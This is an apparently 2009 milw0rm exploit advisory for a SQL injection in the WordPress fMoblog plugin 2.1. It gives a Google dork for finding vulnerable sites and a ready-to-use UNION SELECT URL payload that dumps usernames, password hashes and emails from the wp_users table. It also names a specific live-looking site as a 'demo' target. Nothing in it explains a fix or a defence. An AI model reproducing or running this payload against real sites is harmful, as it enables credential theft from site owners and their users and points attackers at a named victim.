############################################################# # Wordpress Plugin fMoblog Remote SQL Injection Vulnerability # Plugin Home: http://www.fahlstad.se/wp-plugins/fmoblog/ # Plugin Version: 2.1 # Author: strange kevin # Email: strange.kevin@gmail.com # Google Dork: "Gallery powered by fMoblog" ############################################################## # Exploit: http://www.site.com/?page_id=[valid_id]&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users-- # Demo: http://www.tarynitup.com/?page_id=20&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users-- ############################################################## # Greetz: str0ke and milw0rm.com ############################################################## # milw0rm.com [2009-03-17]